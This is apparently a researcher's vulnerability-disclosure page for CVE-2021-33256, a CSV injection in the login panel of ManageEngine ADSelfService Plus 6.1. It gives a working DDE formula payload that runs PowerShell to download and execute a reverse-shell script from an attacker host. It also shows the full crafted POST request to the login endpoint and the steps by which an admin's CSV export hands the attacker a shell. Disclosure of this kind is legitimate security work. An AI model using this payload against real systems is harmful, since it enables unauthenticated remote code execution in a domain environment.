UI
  • ABOUT US
  • UNSAFE
    • sAMAccountName Spoofing in the Forest
    • Pass-the-Hash Attack Over Named Pipes Against ESET Server Security
    • Netcat Relay
    • Hiren's BootCD in the AD
    • Abusing LAPS
  • INLINE
    • Asena
    • Suyla
    • dcFinder
  • 0DAY
    • ADManager Plus Build < 7210 Elevation of Privilege Vulnerability (CVE-2024-24409)
    • Asp.Net Zero v12.3.0 - HTML Injection Leads To Open Redirect via Websockets (CVE-2023-48003)
    • ManageEngine ADManager Plus Build < 7183 - Recovery Password Disclosure (CVE-2023-31492)
    • Multiple ManageEngine Applications Critical Information Disclosure Vulnerability
    • Thecus N4800Eco Nas Server Control Panel Comand Injection
    • ManageEngine ADSelfService Plus 6.1 CSV Injection (CVE-2021-33256)
    • Openlitespeed Web Server 1.7.8 - Privilege Escalation (CVE-2021-26758)
    • KLOG Server (Authenticated) Command Injection (CVE-2021-3317)
    • Cokpit version 234 - Server Side Request Forgery (CVE-2020-35850)
    • KLOG Server Unauthenticated Command Injection (CVE-2020-35729)
    • Pearson Vue - VUEApplicationWrapper Unquoted Service Path (CVE-2020-36154)
    • Intel(r) Management and Security Application 5.2 - UNS Unquoted Service Path
    • BRAdmin Professional 3.75 - Unquoted Service Path
Powered by GitBook
On this page
  • # Description
  • # Proof Of Concept
  • # Reference

Was this helpful?

  1. 0DAY

ManageEngine ADSelfService Plus 6.1 CSV Injection (CVE-2021-33256)

Obtain reverse shell in the domain environment exploiting CSV injection vulnerability

PreviousThecus N4800Eco Nas Server Control Panel Comand InjectionNextOpenlitespeed Web Server 1.7.8 - Privilege Escalation (CVE-2021-26758)

Last updated 1 year ago

Was this helpful?

# Description

There is a CSV injection vulnerability on the login panel of ManageEngine ADSelfService can be exploited by unauthenticated user. j_username parameter seems to vulnerable and reverse shell could be obtained if privileged user exports "User Attempts Audit Report" as CSV file.

Payload:
=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'!A0

# Proof Of Concept

1- Malicious user sends POST request to login page https://TARGET-IP/j_security_check and sets j_username parameter as like the above payload.

j_username parameter:
=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://ATTACKER-IP/Invoke-PowerShellTcp.ps1')'
POST Request:
POST /j_security_check HTTP/1.1
Host: 192.168.1.253:9251
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 192
Origin: https://192.168.1.253:9251
Connection: close
Referer: https://192.168.1.253:9251/j_security_check
Cookie: *
Upgrade-Insecure-Requests: 1

j_username=%3Dcmd%7C%27%2FC+powershell.exe+-c+iex+%28New-Object+Net.WebClient%29.DownloadString%28%27http%3A%2F%2F192.168.1.111%2FInvoke-PowerShellTcp.ps1%27%29%27&j_password=admin&domainName=kandemir.local&AUTHRULE_NAME=ADAuthenticator&adscsrf=741024de-45e4-4193-b0a3-d1fd2d663f28

And the request attempt will be saved to"User Attempts Audit Report" table that is under the Reports > Audit Reports section. Url: https://TARGET-IP/webclient/index.html#/reports/listReports/12

j_username parameter value is saved to "User Name" column which is start of line in the CSV file:

=cmd|'/C powershell.exe -c iex (New-Object Net.WebClient).DownloadString('http://192.168.1.111/Invoke-PowerShellTcp.ps1')'

2- Powershell command that sends reverse shell to attacker machine is embeded to last line of theInvoke-PowershellTcp.ps1 file.

3- If admin user exports this table as CSV file and confirms the alert popup, reverse shell connection will be obtained by malicious user. 

# Author: Metin Yunus Kandemir

# Reference

LogoNVD - CVE-2021-33256
LogoManageEngine ADSelfService Plus 6.1 - CSV InjectionExploit Database
LogoCSV Injection Software Attack | OWASP Foundation
Logonishang/Invoke-PowerShellTcp.ps1 at master · samratashok/nishangGitHub
Exporting User Attempts Audit Report as CSV file
Confirmation for Starting Another Application
Exported CSV file
Getting Reverse Shell